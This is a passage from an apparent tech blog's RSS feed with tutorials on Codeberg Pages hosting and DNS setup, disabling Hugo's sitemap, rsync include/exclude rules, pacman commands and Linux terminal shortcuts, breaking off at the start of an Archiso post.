When it comes to creating bootable USB drives, the choice of tools is diverse. While Rufus is an excellent choice for Windows users looking for speed and reliability, YUMI excels at creating multiboot USB drives, offering versatility to carry various operating systems and tools on a single drive. On the other hand, BalenaEtcher stands out for its cross-platform support and user-friendly interface.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Codeberg Pages: A Guide to Hosting Static Websites for free and Custom Domain Setup</title><link>https://ummit.dev//posts/web/how-to-host-static-websites-with-codeberg-pages-and-custom-domain/</link><guid isPermaLink="true">https://ummit.dev//posts/web/how-to-host-static-websites-with-codeberg-pages-and-custom-domain/</guid><description>Learn how to use Codeberg Pages to host static websites for free and seamlessly integrate your custom domain. Explore the power of hassle-free web hosting with this comprehensive guide.</description><pubDate>Sun, 03 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Hosting with Codeberg Pages

Are you looking to host a website without the hassle of renting a server or dealing with complex backend setups? If your website is static, meaning it consists of only HTML, CSS, and JavaScript files, then Codeberg Pages might be the perfect solution for you. Not only can you host your static site for free, but you can also use your own custom domain to give it a personalized touch.

In this tutorial, we&apos;ll walk you through the process of hosting a website with Codeberg Pages and customizing it with your own domain. Let&apos;s dive right in!

## What Are Codeberg Pages?

Codeberg Pages is a feature provided by Codeberg, a hosting platform for Git repositories. With Codeberg Pages, you can easily publish your static websites directly from your Codeberg repository. It&apos;s a fantastic option for projects, blogs, or personal websites that don&apos;t require server-side scripting.

For more detailed information, you can check out the official Codeberg Pages documentation [here](https://docs.codeberg.org/codeberg-pages/).

## Hosting Your Website with Codeberg Pages

### Step 1: Create an Account

Before you can start hosting your website with Codeberg Pages, you&apos;ll need a Codeberg account. If you don&apos;t already have one, head over to [Codeberg](https://codeberg.org/user/login?redirect_to=%2f) and create an account.

### Step 2: Create a &apos;pages&apos; Repository

Codeberg Pages will automatically detect repositories with the name `pages`. To create one, follow these steps:

1. Log in to your Codeberg account.

2. Click on the &apos;+&apos; icon in the upper right corner and choose &apos;New Repository&apos;.

3. Name your repository &apos;pages&apos;. Make sure the repository name is all in lowercase.

Now, your repository is ready to host your website&apos;s content.

&gt; Note: For Codeberg Pages to work, you&apos;ll need at least one HTML file in this repository. Codeberg Pages detects and serves HTML files for rendering web pages, so ensure you have an &apos;index.html&apos; file.
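
If you&apos;re starting from scratch, a minimal &apos;index.html&apos; is enough to get a page rendering (the text content here is just an example):

```html
&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;meta charset=&quot;utf-8&quot; /&gt;
    &lt;title&gt;My Codeberg Page&lt;/title&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;h1&gt;Hello from Codeberg Pages!&lt;/h1&gt;
  &lt;/body&gt;
&lt;/html&gt;
```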

### Step 3: Set Up Your Git Repository

Now, let&apos;s initialize a Git repository on your local development environment and push your website&apos;s content to your &apos;pages&apos; repository on Codeberg.

1. **Initialize a Git Repository**:

    ```shell
    git init
    ```

2. **Add Your &apos;pages&apos; Repository as the Remote Origin**:

    ```shell
    git remote add origin [your-repo-url]
    ```

3. **Create and Switch to a New Branch Named &apos;pages&apos;**:

    ```shell
    git switch --orphan pages
    ```

4. **Add Your Website&apos;s Files**:

    Make sure to include at least one HTML file (e.g., &apos;index.html&apos;) in this step.

    ```shell
    git add .
    ```

5. **Commit Your Changes**:

    ```shell
    git commit -m &quot;Initial commit&quot;
    ```

6. **Push Your Files to the &apos;pages&apos; Repository on Codeberg**:

    ```shell
    git push origin pages
    ```

Your website content is now uploaded to your &apos;pages&apos; repository on Codeberg, making it accessible via your Codeberg Pages URL. Next, we&apos;ll look at customizing your domain for your static site.

## Adding Your Custom Domain

Now, let&apos;s personalize your website&apos;s domain name. We won&apos;t delve into the domain purchase process here, so let&apos;s begin the customization.

### Step 1: Purchase a Domain

To use a custom domain with your Codeberg Pages site, you&apos;ll first need a domain from a registrar such as [Cloudflare](https://www.cloudflare.com/) or [Namecheap](https://www.namecheap.com/).

### Step 2: Configure Your DNS

Next, configure your domain&apos;s DNS settings. Your DNS settings should look something like this:

| Domain             | Type  | Data                                    |
|--------------------|-------|-----------------------------------------|
| `yourdomain.com`     | A     | `217.197.91.145`                          |
| `yourdomain.com`     | AAAA  | `2001:67c:1401:20f0::1`                  |
| `yourdomain.com`     | TXT   | `pages.yourusername.codeberg.page`         |
| `www.yourdomain.com` | CNAME | `yourdomain.com`                         |

Please note that DNS changes can take some time to propagate across the internet.

#### How Do These Records Work?

- **A (Address) Record**: This type of DNS record maps a domain name to an IPv4 address. In the example:

  - `Domain`: `yourdomain.com` is your custom domain.
  - `Type`: `A` signifies that it&apos;s an IPv4 address record.
  - `Data`: `217.197.91.145` is the IPv4 address to which `yourdomain.com` is mapped.

  When someone enters `yourdomain.com` in a web browser, the DNS system uses the A record to find the corresponding IPv4 address, allowing the browser to connect to the correct server.

- **AAAA (IPv6 Address) Record**: Similar to the A record, this type of DNS record maps a domain name to an IPv6 address, but for IPv6 networks. In the example:

  - `Domain`: `yourdomain.com` is your custom domain.
  - `Type`: `AAAA` signifies that it&apos;s an IPv6 address record.
  - `Data`: `2001:67c:1401:20f0::1` is the IPv6 address to which `yourdomain.com` is mapped.

  This record is used when the client (like a web browser) is using an IPv6 network and needs to resolve the domain to an IPv6 address.

- **TXT (Text) Record**: A TXT record carries human-readable information in a DNS record. In the example:

  - `Domain`: `yourdomain.com` is your custom domain.
  - `Type`: `TXT` signifies that it&apos;s a text record.
  - `Data`: `pages.yourusername.codeberg.page` contains text information.

  TXT records are often used for various purposes, such as domain ownership verification, email authentication (SPF, DKIM), and more. In this case, Codeberg Pages uses it to verify that the custom domain belongs to your Pages site.

- **CNAME (Canonical Name) Record**: A CNAME record is used to create an alias for a domain name. In the example:

  - `Domain`: `www.yourdomain.com` is a subdomain alias.
  - `Type`: `CNAME` signifies that it&apos;s a canonical name record.
  - `Data`: `yourdomain.com` indicates that `www.yourdomain.com` is an alias for `yourdomain.com`.

  When a user enters `www.yourdomain.com` in a web browser, the DNS system redirects them to `yourdomain.com`. CNAMEs are often used to create shorter, more user-friendly URLs that point to longer or canonical domain names.

These DNS record types play a crucial role in ensuring that when someone accesses your custom domain, they are directed to the correct server and resources associated with that domain.
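
Once the records are in place, you can check them from a terminal with `dig` (or `nslookup`); replace the domain with your own:

```plain
dig +short yourdomain.com A
dig +short yourdomain.com AAAA
dig +short yourdomain.com TXT
dig +short www.yourdomain.com CNAME
```

Each command should print the value from the corresponding row of the table above once propagation has finished.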

&gt;For more detailed instructions on configuring your custom domain, refer to the [Codeberg Pages documentation](https://docs.codeberg.org/codeberg-pages/using-custom-domain/).

### Step 3: Create a &apos;.domains&apos; File

To link your custom domain to your Codeberg Pages site, create a file named &apos;.domains&apos; and add three lines to it:

```shell
&lt;your-custom-domain&gt;
&lt;your_username&gt;.codeberg.page
pages.&lt;your_username&gt;.codeberg.page
```

Replace `&lt;your-custom-domain&gt;` with your custom domain name and `&lt;your_username&gt;` with your Codeberg username.

Your final &apos;.domains&apos; file should look something like this:

```shell
mydomain.com
myusername.codeberg.page
pages.myusername.codeberg.page
```

Once you&apos;ve created this file, push it to your &apos;pages&apos; repository.

```shell
git add .domains
git commit -m &quot;Create domain&quot;
git push origin pages
```

### Final Step: Testing Your Custom Domain

It might take a few minutes for your DNS changes to fully propagate. Once that&apos;s done, you can visit your website using your custom domain to see it live. Alternatively, a quick way to check whether the DNS changes have taken effect is to run a DNS lookup on your domain; if the results show the IP addresses you&apos;ve pointed to, your changes are working.

&gt; **Tips**: If you&apos;re using the Cloudflare CDN proxy, your domain resolves to Cloudflare&apos;s IP addresses rather than the ones above. If domain validation fails, disable the proxy by clicking the orange cloud icon so it turns grey (DNS only).

And that&apos;s it! Congratulations on successfully hosting your static website with Codeberg Pages and customizing it with your own domain. Thank you for following these steps!</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Hugo: How to Disable the Sitemap After Generating Your Public Files</title><link>https://ummit.dev//posts/web/hugo/hugo-how-to-disable-sitemap/</link><guid isPermaLink="true">https://ummit.dev//posts/web/hugo/hugo-how-to-disable-sitemap/</guid><description>Learn how to disable Hugo&apos;s automatically generated sitemap, along with the RSS feed and robots.txt, using the disableKinds configuration.</description><pubDate>Sun, 03 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

If you’re using Hugo, a popular static site generator, you might be aware that it automatically generates certain files, such as sitemaps, to enhance your website’s functionality and search engine optimization. However, there are cases where you might want to disable the sitemap generation. In this article, we’ll explore how to disable the sitemap in Hugo after generating your public files.

## Why Disable the Sitemap?

Before we dive into the how, let&apos;s briefly discuss why you might want to disable the sitemap in Hugo:

1. **Customization**: You might have specific needs for your website&apos;s sitemap structure that Hugo&apos;s default sitemap generation doesn&apos;t fulfill. In such cases, you can choose to disable Hugo&apos;s sitemap generation and create a custom sitemap yourself.

2. **Reducing Files**: If you want to reduce the number of files in your public directory or keep it clean, disabling the sitemap can help accomplish this.

## Steps to Disable the Sitemap in Hugo

To disable the sitemap in Hugo, follow these steps:

### 1. Open Your Hugo Configuration File

Start by opening your Hugo project&apos;s configuration file. This file is typically named `config.toml`, `config.yaml`, or `hugo.toml`, and it is located in the root directory of your Hugo project.

### 2. Add `disableKinds` Configuration

Inside your configuration file, add the `disableKinds` parameter at the top level (outside of any section or table). It lists the page kinds Hugo should not render. To disable the sitemap, use it like this:

```toml
disableKinds = [ &quot;sitemap&quot; ]
```

If you want to disable multiple output types, you can list them within the square brackets. For example, to disable the sitemap, RSS feed, and `robots.txt` file, you can use the following configuration:

```toml
disableKinds = [
  &quot;sitemap&quot;,
  &quot;RSS&quot;,
  &quot;robotsTXT&quot;
]
```

By adding `sitemap`, `RSS`, and `robotsTXT` to the disableKinds configuration, you have effectively disabled the generation of the sitemap, RSS feed, and the robots.txt file in your Hugo project.

### Example Result

Your configuration should look something like this:

```toml
# Example Hugo Configuration File
# -------------------------------

# Basic Site Configuration
baseURL = &quot;https://yourdomain.com/&quot;
title = &quot;My Pages&quot;
theme = &quot;mytheme&quot;

# Disable Output Kinds
disableKinds = [
  &quot;sitemap&quot;,
  &quot;RSS&quot;,
  &quot;robotsTXT&quot;
]
```

This example demonstrates a simplified Hugo configuration file with some common settings, including the base URL, site title, theme, and the disabling of specific output kinds as discussed earlier in the article. You can customize these settings according to your actual Hugo project&apos;s configuration.

### 3. Save the Configuration File

After adding or modifying the `disableKinds` configuration, save the changes to your configuration file.

### 4. Rebuild Your Hugo Site and Verify

To apply the changes and disable the sitemap, you need to rebuild your Hugo site. Open your terminal or command prompt, navigate to your Hugo project&apos;s root directory, and run the following command:

```shell
hugo --logLevel debug
```

Hugo will recompile your site with the updated configuration, and the sitemap will no longer be generated in the `public` directory.

### Removing a Stale Sitemap

However, if you find that the sitemap file still exists in the `public` directory after running the command, you can take additional steps to remove it:

```shell
cd public &amp;&amp; rm -rfv * &amp;&amp; cd .. &amp;&amp; hugo --logLevel debug
```

This one-liner navigates into the `public` directory, removes its contents, returns to the project&apos;s root directory, and rebuilds the site with debug output. Be careful: `rm -rfv *` permanently deletes everything in the current directory, so make sure the `cd public` step succeeded before it runs. Alternatively, Hugo&apos;s `--cleanDestinationDir` flag removes files from the destination directory that are not part of the current build.

## Conclusion

Disabling the sitemap in Hugo is a straightforward process that allows you to have more control over your website&apos;s output. Whether you have specific SEO requirements, customization needs, or simply want to keep your `public` directory cleaner, Hugo&apos;s flexibility makes it easy to achieve your goals.

## See also

If you also want to control how search engine crawlers index your site, check out this article:

[Search Engine Crawlers: A Guide to custom robots.txt with Disallow or allow Rule](/en/blog/web/search-engine/how-to-block-search-engine-with-robots.txt-and-custom/)

## References

- [Customize sitemap in Hugo Website](https://codingnconcepts.com/hugo/sitemap-hugo/)
- [Turn Off sitemap.xml - HUGO discourse](https://discourse.gohugo.io/t/turn-off-sitemap-xml/6912)
- [Disable page from sitemap - HUGO discourse](https://discourse.gohugo.io/t/disable-page-from-sitemap/37213)
- [Sitemap templates - HUGO](https://gohugo.io/templates/sitemap-template/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Rsync: A Comprehensive Guide</title><link>https://ummit.dev//posts/linux/tools/rsync/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/rsync/</guid><description>Explore the power of rsync, a versatile tool that efficiently synchronizes data between different locations, ensuring your files are up-to-date and organized.</description><pubDate>Mon, 28 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Why Rsync?

In today&apos;s fast-paced digital world, the need to efficiently synchronize data across various devices, servers, or locations is more crucial than ever. Whether you&apos;re a tech enthusiast, a system administrator, or a regular user, rsync is a powerful tool that can simplify and streamline the process of data synchronization. In this guide, we&apos;ll explore what it is, how it works, and how you can make the most of it to keep your data up-to-date and organized.

## What is Rsync?

Rsync, which stands for &quot;remote synchronization,&quot; is a command-line utility available on Unix-based operating systems like Linux and macOS. It&apos;s designed to synchronize and transfer files between two locations, ensuring that the destination location mirrors the source location. Rsync&apos;s primary goal is to minimize the amount of data transferred during synchronization, making it an efficient tool for both local and remote file synchronization tasks.

## Install Rsync

If you&apos;re using Arch Linux or an Arch-based distribution like Manjaro, you can install rsync using the Pacman package manager. Open a terminal and run the following command:

```shell
# syncing the database and upgrading in the same operation avoids a partial upgrade
sudo pacman -Syu rsync
```

### Key Features of Rsync

1. **Efficient Data Transfer:** Rsync uses a delta-transfer algorithm that identifies and transfers only the portions of files that have changed. This significantly reduces the amount of data transferred, making it ideal for large files or slow connections.

2. **Network-friendly:** Rsync is optimized for network transfers, and it can work over SSH, which ensures secure and encrypted data synchronization.

3. **Preservation of Attributes:** Rsync can preserve file permissions, ownership, timestamps, and other attributes during synchronization.

4. **Partial Transfers:** In case a transfer is interrupted, rsync can resume from where it left off, saving time and bandwidth.

5. **Versatility:** Rsync can be used for local copying, remote copying, and syncing data between local and remote locations.

### Basic Usage

The basic syntax of rsync is as follows:

```bash
rsync [options] &lt;source&gt; &lt;destination&gt;
```

Here&apos;s a simple example of using rsync to copy files from a local source directory to a remote server:

```bash
rsync -avz /path/to/source user@remote-server:/path/to/destination
```

- `-a`: Archive mode, which preserves permissions, timestamps, and more.
- `-v`: Verbose mode, providing detailed output.
- `-z`: Compress data during transfer to save bandwidth.

### More Usage

1. **Exclude Files:** Sometimes, you might want to exclude certain files or directories from being synchronized. The `--exclude` option allows you to specify patterns or names of files and directories that you want to skip during synchronization. This is particularly useful when you have files that you don&apos;t want to be mirrored on the destination. For example:

   ```shell
   rsync -av --exclude=&apos;*.log&apos; source/ destination/
   ```

   In this example, any files with the &quot;.log&quot; extension will be excluded from the synchronization process.

2. **Delete Extraneous Files:** Keeping your destination in sync with the source also involves removing files from the destination that no longer exist on the source. The `--delete` option ensures that files on the destination that aren&apos;t present on the source are deleted, resulting in an exact match between the two locations. Be cautious when using this option, as it involves data deletion:

   ```shell
   rsync -av --delete source/ destination/
   ```

   With this command, any files on the destination that aren&apos;t present on the source will be removed.

3. **Remote Shell:** Rsync is not limited to synchronizing local files; it can also synchronize data across different machines using various remote shell protocols like SSH. The `-e` option lets you specify the remote shell to be used. For instance, if you&apos;re syncing data between two machines over SSH, you can use the following command:

   ```shell
   rsync -av -e &quot;ssh&quot; source/ remoteuser@remotehost:/path/to/destination/
   ```

   This command establishes an SSH connection to the remote host and syncs the data securely.

4. **Include Files:** The `--include` option complements the `--exclude` option, allowing you to specify patterns for files and directories that you want to include in the synchronization. This is useful when you want to exclude a broad pattern but keep certain exceptions. Because rsync applies the first matching filter rule, the `--include` for the exception must come before the broader `--exclude`:

   ```shell
   rsync -av --include=&apos;important.log&apos; --exclude=&apos;*.log&apos; source/ destination/
   ```

   Here, all files with the &quot;.log&quot; extension are excluded, except for the file named &quot;important.log&quot;.

Rsync&apos;s flexibility and advanced options make it a versatile tool for various synchronization scenarios. By harnessing these features, you can fine-tune your synchronization processes to match your specific needs while maintaining data integrity and organization.

### Using `--include` and `--exclude` Together

Combining the `--include` and `--exclude` options in rsync allows for intricate control over the files and directories that are included or excluded during synchronization. This advanced approach lets you create fine-grained rules to tailor the synchronization process to your precise requirements.

For example, consider a scenario where you want to synchronize only Python files (with a &quot;.py&quot; extension) from the source directory while excluding all other types of files. You can achieve this by using the `--include` and `--exclude` options together:

```shell
rsync -av --include=&apos;*.py&apos; --exclude=&apos;*&apos; source/ destination/
```

In this command:

- `--include=&apos;*.py&apos;`: This specifies that only files with a &quot;.py&quot; extension should be included in the synchronization.
- `--exclude=&apos;*&apos;`: This indicates that all other files and directories should be excluded from synchronization.

As a result, rsync will copy only the Python files in the top level of the source directory. Because `--exclude=&apos;*&apos;` also matches subdirectories, add `--include=&apos;*/&apos;` before the exclude if you want rsync to descend into them as well.

This combination of options is incredibly powerful and allows you to create complex rules for inclusion and exclusion. You can adapt this approach to various scenarios, such as syncing specific file types, excluding certain directories, or customizing synchronization based on your data organization needs.

By mastering the use of `--include` and `--exclude` together, you unlock the full potential of rsync&apos;s flexibility and precision in data synchronization.
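This pattern is easy to experiment with locally. The sketch below (throwaway `/tmp` paths) adds `--include=&apos;*/&apos;` so that rsync descends into subdirectories while still copying only `.py` files:

```shell
# build a small tree with mixed file types (throwaway example paths)
mkdir -p /tmp/filter-demo/src/sub
echo 'print(1)' > /tmp/filter-demo/src/app.py
echo 'print(2)' > /tmp/filter-demo/src/sub/util.py
echo 'noise'    > /tmp/filter-demo/src/sub/debug.log

# include directories and .py files; exclude everything else
rsync -av --include='*/' --include='*.py' --exclude='*' \
  /tmp/filter-demo/src/ /tmp/filter-demo/dst/
```

After the run, `app.py` and `sub/util.py` exist under `dst/`, while `debug.log` does not.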

### Comprehensive Synchronization with Multi-Include Options

To illustrate the power of rsync&apos;s multiple options, let&apos;s explore a scenario where you want to synchronize a range of files while adhering to specific rules. Consider the following command:

```shell
rsync -av --prune-empty-dirs \
--include=&quot;*/&quot; \
--include=&quot;*.c&quot; \
--include=&quot;*.h&quot; \
--include=&quot;*.json&quot; \
--exclude=&quot;*&quot; \
source/ destination/
```

In this example:

- `--prune-empty-dirs`: This option prevents rsync from creating directories on the destination that would end up empty because everything inside them was filtered out.

- `--include=&quot;*/&quot;`: This rule matches every directory, letting rsync descend through the entire source tree while the remaining rules decide, file by file, what to copy.

- `--include=&quot;*.c&quot;`: This rule extends the synchronization to encompass files with the &quot;.c&quot; extension.

- `--include=&quot;*.h&quot;`: This rule further expands the synchronization to cover files with the &quot;.h&quot; extension.

- `--include=&quot;*.json&quot;`: This rule introduces synchronization for files with the &quot;.json&quot; extension.

- `--exclude=&quot;*&quot;`: This rule acts as a final filter, excluding any file that hasn&apos;t been specifically included. Order matters here: rsync applies the first rule that matches, so a bare `--include=&quot;*&quot;` at the top would match everything and turn this exclude into a no-op.

#### How does this work?

With this configuration, the rsync command executes the following steps:

1. The `--include=&quot;*/&quot;` rule lets rsync traverse every directory, so files at any depth are considered for synchronization.

2. Files with &quot;.c&quot; and &quot;.h&quot; extensions are then encompassed due to the `--include=&quot;*.c&quot;` and `--include=&quot;*.h&quot;` rules.

3. Additionally, files with a &quot;.json&quot; extension are also included based on the `--include=&quot;*.json&quot;` rule.

4. Finally, the `--exclude=&quot;*&quot;` rule ensures that any files not covered by the specific inclusion rules are excluded from synchronization.

By combining these options, rsync provides a powerful mechanism to orchestrate complex synchronization scenarios while maintaining granular control over the data being transferred. Whether you&apos;re managing code files, documents, or multimedia assets, rsync&apos;s multifaceted options empower you to tailor synchronization to your exact requirements.

### Conclusion

In the realm of data synchronization, **rsync** stands as a versatile and efficient tool that simplifies the process of copying and updating files between different locations. Its ability to transfer only the changed portions of files, along with preserving attributes, makes it a go-to choice for various scenarios, from basic local file copying to complex remote data synchronization. By understanding the core concepts and mastering the various options, you&apos;ll be equipped to leverage rsync&apos;s capabilities to keep your data organized, up-to-date, and readily accessible.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>The Ultimate Guide to Pacman Package Manager Commands on Arch Linux</title><link>https://ummit.dev//posts/linux/distribution/archlinux/archlinux-pacman-commands/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/archlinux/archlinux-pacman-commands/</guid><description>Learn the essential Pacman commands for installing, updating, and managing packages on your Arch Linux system. Master the art of software management with this comprehensive guide to Pacman, the powerhouse package manager.</description><pubDate>Mon, 28 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

If you&apos;re an Arch Linux user, you&apos;re undoubtedly familiar with Pacman – the powerhouse package manager that defines the Arch Linux experience. Known for its speed, efficiency, and simplicity, Pacman is your go-to tool for installing, updating, and managing software on your Arch Linux system. In this comprehensive guide, we&apos;ll take you through the essential Pacman commands that are pivotal for efficient system management.

### Installing Packages

To install new packages on Arch Linux, open your terminal and use the following command:

```shell
sudo pacman -S package_name
```

Remember to replace `package_name` with the actual name of the package you want to install.

### Updating the Package Database

Before adding new packages or updating your system, it&apos;s crucial to update the local package database. Execute the command below to achieve this:

```shell
sudo pacman -Sy
```

The `-Sy` flag syncs your package database with the latest information from the Arch Linux repositories. Be aware that installing packages after syncing without also upgrading (`-Syu`) can leave the system in a partially upgraded state, which Arch Linux does not support.

### System Upgrade

Regular system updates are essential for the security and stability of your Arch Linux system. Use the command below to initiate a full system upgrade:

```shell
sudo pacman -Syu
```

The `-Syu` flag combines package synchronization and system upgrade. This is the command to remember for routine system updates.

```shell
sudo pacman -Syuv
```

The `-v` flag adds verbose output, printing extra detail about each step of the upgrade; it does not change which packages are updated.

### Removing Packages

When it&apos;s time to bid farewell to a package, you can remove it with the following command:

```shell
sudo pacman -R package_name
```

This command removes the package while retaining its configuration files.

```shell
sudo pacman -Rs package_name
```

If you&apos;re looking to remove a package along with its no-longer-needed dependencies, use the `-Rs` flag.

```shell
sudo pacman -Rns package_name
```

For a more thorough cleanup that also removes dependencies that were installed as requirements but are no longer necessary, go with the `-Rns` flag.

### Querying Package Information

To check if a specific package is installed on your system, run the following command:

```shell
$ pacman -Q linux
linux 6.4.12.arch1-1
```

For detailed information about a specific package, including its version, description, and installation date, use:

```shell
$ pacman -Qi linux
Name            : linux
Version         : 6.4.12.arch1-1
Description     : The Linux kernel and modules
Architecture    : x86_64
URL             : https://github.com/archlinux/linux/commits/v6.4.12-arch1
Licenses        : GPL2
Groups          : None
...
```

To search for packages that match a particular term in their names or descriptions, use:

```shell
$ pacman -Qs linux
local/alsa-lib 1.2.9-1
    An alternative implementation of Linux sound support
local/arch-install-scripts 28-1
    Scripts to aid in installing Arch Linux
local/archiso 71-1
    Tools for creating Arch Linux live and install iso images
local/archlinux-keyring 20230821-1
    Arch Linux PGP keyring
local/avahi 1:0.8+r22+gfd482a7-1
    Service Discovery for Linux using mDNS/DNS-SD (compatible with Bonjour)
...
```

### Non-installed and Installed Packages

For a broader search that encompasses both package names and descriptions, try:

```shell
pacman -Ss linux
```

The output will display packages that match the search term, along with their descriptions and installation status.

To view detailed information about a package available in the remote repository, use:

```shell
pacman -Si linux
```

This command provides comprehensive information about a specific package, including its repository, version, description, architecture, URL, licenses, and more.

## Conclusion

Becoming proficient with the Pacman package manager is a fundamental skill for any Arch Linux user. The commands outlined in this guide will empower you to install, upgrade, and manage packages seamlessly, keeping your system current and efficient as you delve deeper into the Arch Linux ecosystem.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Super Handy Linux Command Tips That Will Transform Your Terminal Experience</title><link>https://ummit.dev//posts/linux/tools/terminal/terminal-skill/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/terminal/terminal-skill/</guid><description>Unlock the true potential of the Linux terminal with these 21 command tips that can revolutionize your productivity and efficiency.</description><pubDate>Mon, 28 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

The Linux terminal is a remarkable tool that empowers users to interact with their systems in a powerful and efficient manner. Whether you&apos;re a seasoned developer, a system administrator, or a curious enthusiast, mastering the art of the terminal can significantly boost your productivity and make your daily tasks smoother. In this guide, we&apos;ll delve into a collection of 21 super handy Linux command tips that are poised to revolutionize your terminal experience and transform the way you work.

### Commands for Daily Use

#### Autocompletion with Tab

Save valuable time by harnessing the power of the Tab key for autocompletion. When typing commands or file paths, simply press Tab to let the terminal automatically complete the rest or provide you with a list of possible options.

```shell
Press TAB
```

#### Switch Back to the Last Working Directory

Effortlessly navigate back to your previous working directory by typing `cd -`. This nifty shortcut is particularly useful when you&apos;re shuffling between two directories.

```shell
cd -
```

#### Return to the Home Directory

Swiftly return to your home directory with the command `cd ~`. This is a quick way to jump back to your starting point.

```shell
cd ~
```

####  Run Multiple Commands in One Line

Combine multiple commands in a single line by using semicolons (;) to separate them. For example:

```shell
command1; command2; command3
```
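A concrete instance, using a throwaway `/tmp` path: all three commands run in order, each one regardless of the previous one&apos;s outcome:

```shell
mkdir -p /tmp/chain-demo; ls /tmp/chain-demo; echo 'all three ran'
```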

#### Run Commands Sequentially

Execute commands sequentially using double ampersands (&amp;&amp;), ensuring that each subsequent command runs only if the previous one was successful:

```shell
command1 &amp;&amp; command2
```

#### Jump to the Beginning or End of a Line

Move the cursor to the start of a line with `Ctrl + A` and to the end with `Ctrl + E`.

```shell
Press Ctrl + A
Press Ctrl + E
```

#### Interrupt a Command

Halt or cancel a running command by pressing `Ctrl + C`.

```shell
Press Ctrl + C
```

#### Cancel the Current Line

Erase the current line from the cursor to the beginning using `Ctrl + U`.

```shell
Press Ctrl + U
```

#### Delete the Part Before the Cursor

Eliminate the word before the cursor with `Ctrl + W`.

```shell
Press Ctrl + W
```

#### Paste from the Clipboard

To paste text from the clipboard, utilize `Ctrl + Shift + V`.

```shell
Press Ctrl + Shift + V
```

#### Quickly Clear the Terminal

Type `clear` to swiftly clear the terminal screen.

```shell
clear
```

#### Repeating the Previous Command

Recall and edit previous commands using the `Up` arrow key. Press `Enter` to execute.

```shell
arrow key (Up or down)
```

#### Repeating the Last Argument

Recall the last argument from the previous command with `Alt + .`.

```shell
Press Alt + .
```

#### Creating Directories and Parent Directories

Simplify directory creation by using `mkdir -p` to generate directories along with their parent directories.

```shell
mkdir -p /folder1/folder2/folder3/
```

### Commands for Development

#### Recall Specific Arguments

Retrieve a specific argument from the previous command by typing `Alt + 1`, `Alt + 2`, and so on (the digit selects which argument), followed by `Alt + .` to insert it.

```shell
Press Alt + 1, then Alt + .
Press Alt + 2, then Alt + .
...
```

#### Use the Man Page

Access detailed information about a command by typing `man command` to open its manual page.

```shell
man chmod
```

#### Search History with Ctrl + R

Search through your command history by pressing `Ctrl + R` and typing your query.

```shell
Press Ctrl + R
```

### Commands for Execution

#### Redirect Output to a File

Redirect command output to a file with `&gt;` to overwrite the file if it exists:

```shell
cat overwrite_this &gt; file.txt
```

#### Append Output to a File

Redirect command output and append it to a file using `&gt;&gt;`:

```shell
cat add_lines_here &gt;&gt; file.txt
```
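Putting the two together with a throwaway file path: `&gt;` truncates the file each time, while `&gt;&gt;` grows it:

```shell
echo 'first line'  > /tmp/redirect-demo.txt   # creates or overwrites the file
echo 'second line' >> /tmp/redirect-demo.txt  # appends to the existing file
cat /tmp/redirect-demo.txt
```

After running this, the file contains both lines in order.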

### For Debugging: Reading a Log File in Real Time

When troubleshooting and debugging, it&apos;s often crucial to monitor log files in real time to gain insights into what&apos;s happening within your application. The `tail` command with the `-f` option is an invaluable tool for this purpose.

#### Reading Logs in Real Time

To monitor a log file as it&apos;s being updated, use the `tail -f` command followed by the path to the log file:

```shell
tail -f path_to_log
```

As new log entries are written to the file, they&apos;ll be displayed in your terminal in real time. This is particularly useful for tracking events as they happen and identifying issues as they arise.

#### Filtering Relevant Information

Logs can often be verbose, containing a lot of information that might not be immediately relevant to your debugging efforts. You can enhance your log monitoring experience by combining `tail -f` with the `grep` command to filter out specific lines based on search terms:

```shell
tail -f path_to_log | grep search_term
```

In this command, replace `search_term` with the keyword you&apos;re looking for in the log entries. This will narrow down the displayed output to only show the lines containing the specified term.

#### Ensuring Persistent Monitoring

Sometimes, log files might be rotated or deleted as part of the application&apos;s logging process. To ensure continuous monitoring even when the log file is deleted and recreated, you can use the `-F` option instead of `-f`:

```shell
tail -F path_to_log
```

With this option, `tail` will continue monitoring the file even if it&apos;s removed and re-created, allowing you to maintain an uninterrupted view of the log data.
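The same pipeline works on a static file too, which makes it easy to experiment. This sketch fabricates a small log under `/tmp` (hypothetical contents) and filters it for errors:

```shell
# fabricate a tiny log file (hypothetical contents)
printf 'INFO  starting up\nERROR disk full\nINFO  shutting down\n' > /tmp/demo.log

# show the last lines and keep only those matching the search term
tail -n 10 /tmp/demo.log | grep ERROR
# prints: ERROR disk full
```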

## Conclusion

These Linux command tips are just the tip of the iceberg when it comes to maximizing your terminal experience. As you become more comfortable with the terminal, you&apos;ll uncover countless ways to streamline your tasks, automate processes, and become a more proficient and efficient Linux user.

## References

- [21 Super Handy Linux Command Tips and Tricks That Will Save you a lot of Time and Increase Your Productivity](https://itsfoss.com/linux-command-tricks/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Building Your Own Custom Arch Linux ISO with Archiso</title><link>https://ummit.dev//posts/linux/distribution/archlinux/archlinux-build-your-own-kernel-archlinux_iso/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/archlinux/archlinux-build-your-own-kernel-archlinux_iso/</guid><description>Explore the process of creating a personalized Arch Linux ISO using the official tool called Archiso to craft your own customized Arch Linux ISO.</description><pubDate>Sun, 27 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## What is Archiso?

Archiso is the official tool used to build the Arch Linux live CD/USB ISO images. It&apos;s a versatile utility that allows you to construct bootable ISO images for various purposes, from system recovery to creating a personalized installer or even your own Arch-based distribution.

## Why Archiso?

